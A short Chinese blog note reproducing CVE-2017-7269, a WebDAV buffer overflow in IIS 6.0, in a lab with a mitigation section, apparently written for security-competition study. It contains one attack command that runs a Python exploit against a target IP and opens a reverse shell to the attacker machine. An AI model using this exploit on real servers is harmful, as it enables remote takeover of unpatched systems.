IIS6.0 CVE-2017-7269 漏洞復現
- 2019 年 10 月 7 日
- 筆記
在目前很多的攻防比賽中,IIS6.0仍然會出現,因此,我們再次再來和大家一起學習一波此漏洞的利用。
0X0 概述
Windows 2003 R2上使用IIS 6.0 爆出了0Day漏洞(CVE-2017-7269),漏洞利用PoC開始流傳,但糟糕的是這產品已經停止更新了。
微軟方面也已經確認了該漏洞:Windows Server 2003R2版本IIS6.0的WebDAV服務中的ScStoragePathFromUrl函數存在快取區溢出漏洞,遠程攻擊者通過以「If: <http://」開頭的長header PROPFIND請求,執行任意程式碼。該漏洞自2016年7、8月起就已被利用。
由於開啟WebDAV服務就存在該漏洞,所以對於目前的IIS 6.0用戶而言,可用的變通方案就是關閉WebDAV服務。
0X1:環境搭建:
Winodws Server2003,IIS開啟寫功能
物理機IP:192.168.1.2
靶 機 IP:172.16.1.17
0x2 漏洞利用
本地開啟監聽埠:

運行腳本攻擊:
python iis6.0.py 172.16.1.17 80 192.168.1.24444

查看反彈:

攻擊完成後,靶機的web服務就無法正常訪問了!不過這個時候就已經完全控制系統了!
0X3 漏洞修復
關閉讀寫功能,禁止用戶通過此功能寫入。
發送:「IIS6.0「關鍵字」獲取實驗學習驗證程式碼文件。